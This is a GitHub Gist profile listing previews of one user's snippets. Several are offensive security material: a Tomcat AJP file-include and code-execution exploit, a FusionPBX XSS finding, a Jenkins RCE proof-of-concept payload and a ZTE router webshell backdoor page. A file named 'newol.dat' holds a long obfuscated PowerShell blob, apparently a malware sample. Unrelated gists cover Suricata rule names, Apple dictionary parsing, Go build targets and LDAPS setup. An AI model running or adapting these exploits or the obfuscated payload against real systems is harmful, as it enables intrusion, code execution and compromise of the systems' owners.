Skip to content

Instantly share code, notes, and snippets.

Avatar

xax007

  • Error: Unable to resolve
View GitHub Profile
@xax007
xax007 / tomcat-ajp-lfi.py
Created February 23, 2020 15:00
Aapche Tomcat AJP local file include and code execution exploit
View tomcat-ajp-lfi.py
#!/usr/bin/env python
#Tomcat-Ajp lfi
import struct
# Some references:
# [url]https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html[/url]
def pack_string(s):
if s is None:
return struct.pack(">h", -1)
l = len(s)
@xax007
xax007 / FusionPBX-XSS.md
Last active February 4, 2021 10:29
FusionPBX-XSS
View FusionPBX-XSS.md
@xax007
xax007 / FusionPBX-XSS.md
Last active November 20, 2019 16:30
FusionPBX XSS
View FusionPBX-XSS.md

XSS 1

Cross-site scripting (XSS) vulnerability in file app/xml_cdr/xml_cdr_search.php line 63 allows remote attackers to inject arbitrary web script or HTML via the redirect parameter.

...
    if (strlen(check_str($_GET['redirect'])) > 0) {
        echo "<form method='get' action='" . $_GET['redirect'] . ".php'>\n";
    }
...
@xax007
xax007 / Suricata_Rules_Descriptionaa
Created June 3, 2019 05:27
Suricata_Rules_Descriptionaa
View Suricata_Rules_Descriptionaa
SURICATA Applayer Mismatch protocol both directions
SURICATA Applayer Wrong direction first Data
SURICATA Applayer Detect protocol only one direction
SURICATA Applayer Protocol detection skipped
SURICATA Applayer No TLS after STARTTLS
SURICATA Applayer Unexpected protocol
ET CNC Shadowserver Reported CnC Server Port 80 Group 1
ET CNC Shadowserver Reported CnC Server Port 81 Group 1
ET CNC Shadowserver Reported CnC Server Port 443 Group 1
@xax007
xax007 / 0dedict.py
Created May 5, 2019 06:43 — forked from josephg/0dedict.py
Apple dictionaries
View 0dedict.py
# Thanks to commenters for providing the base of this much nicer implementation!
# Save and run with $ python 0dedict.py
# You may need to hunt down the dictionary files yourself and change the awful path string below.
# This works for me on MacOS 10.14 Mohave
from struct import unpack
from zlib import decompress
import re
filename = '/System/Library/Assets/com_apple_MobileAsset_DictionaryServices_dictionaryOSX/9f5862030e8f00af171924ebbc23ebfd6e91af78.asset/AssetData/Oxford Dictionary of English.dictionary/Contents/Resources/Body.data'
f = open(filename, 'rb')
View newol.dat
This file has been truncated, but you can view the full file.
$epGjM = [Char[ ] ]"))93]rAhc[]GNiRtS[,'tprT'(ECalPer.)63]rAhc[]GNiRtS[,)55]rAhc[+18]rAhc[+411]rAhc[+28]rAhc[+211]rAhc[((ECalPer.)'|',)77]rAhc[+79]rAhc[+94]rAhc[+38]rAhc[+15]rAhc[((ECalPer.)43]rAhc[]GNiRtS[,'VMbWd'(ECalPer.)'
)tprTtprTNiOJ-tprTXtprT+]3,1[)(GnIRTSOt.EcneREfeRpesoBrEv7QrRp (. Ma1S3)69]rahc[,)89]rahc[+99]rahc[+79]rahc[+511]rahc[+84]rahc[( ecALPER- 43]rahc[,tprTmHLYsJtprT EcALpERc- 63]rahc[,tprTGDuihltprTecALPER-421]rahc[,tprTstMqQztprT ecALPER- 29]'+'rahc[,)35]rahc[+121]rahc[+89]rahc[+87]rahc[+45]rahc[+84]rahc[( ecALPER-93]rahc[,)17]rahc[+111]rahc[+27]rahc[+911]rahc[+68]rahc[+67]rahc[( EcALpERc-))tprTAvDREPQQ8Y0iEBjd3DEAAAAu8YWAEJ9MBAWjEBAAAoZhPAchAAAASm+3LG0//TUkoDgCKIVFNiEIkQUiIBgCK4XBNy0zLGEAKUAtF0ISAAw9HmbQGsOAAcv65GEAAAgypDgJDm0///rAoDXSLiUC0lchI5wiJBAAAQOhPAchYv4//TcboDXSLikDLmEAAAg+F+AwFi9i//f3DjuzLi00La8iNx8iFR+MFNAdAX4//vnToP9iLcXG7IBdJXISY50iIdwVIawRIiA6BL8iFcEiQgewCvIBHhIGoHswL+xiBlDBJiDBLCAAAQQrE0IOkw0iIJxcAAAAgSCl58fVNCAABsWhPAchYv4//TM9oDXTLm0DJGEAAAAkkw7iMBAAA87hPAAAAAIJMuDyLMg
@xax007
xax007 / go-os-arch.md
Created April 11, 2019 02:30 — forked from asukakenji/0-go-os-arch.md
Go (Golang) GOOS and GOARCH
View go-os-arch.md

Go (Golang) GOOS and GOARCH

All of the following information is based on go version go1.8.3 darwin/amd64.

A list of valid GOOS values

(Bold = supported by go out of the box, ie. without the help of a C compiler, etc.)

  • android
  • darwin
@xax007
xax007 / README.md
Created March 16, 2019 09:09 — forked from Tom4t0/README.md
Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers.
View README.md

Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers

By default Microsoft active directory servers will offer LDAP connections over unencrypted connections (boo!).

The steps below will create a new self signed certificate appropriate for use with and thus enabling LDAPS for an AD server. Of course the "self-signed" portion of this guide can be swapped out with a real vendor purchased certificate if required.

Steps have been tested successfully with Windows Server 2012R2, but should work with Windows Server 2008 without modification. Requires a working OpenSSL install (ideally Linux/OSX) and (obviously) a Windows Active Directory server.

View CVE-2019-1003000-Jenkins-RCE-POC.py
import argparse
import jenkins
import time
from xml.etree import ElementTree
payload = '''
import org.buildobjects.process.ProcBuilder
@Grab('org.buildobjects:jproc:2.2.3')
class Dummy{ }
@xax007
xax007 / web_shell_cmd.gch
Created November 30, 2018 11:32
R7-2013-18, ZTE F460 and ZTE F660 web_shell_cmd.gch Backdoor
View web_shell_cmd.gch
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, must-revalidate">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>
F460 Webshell
</title>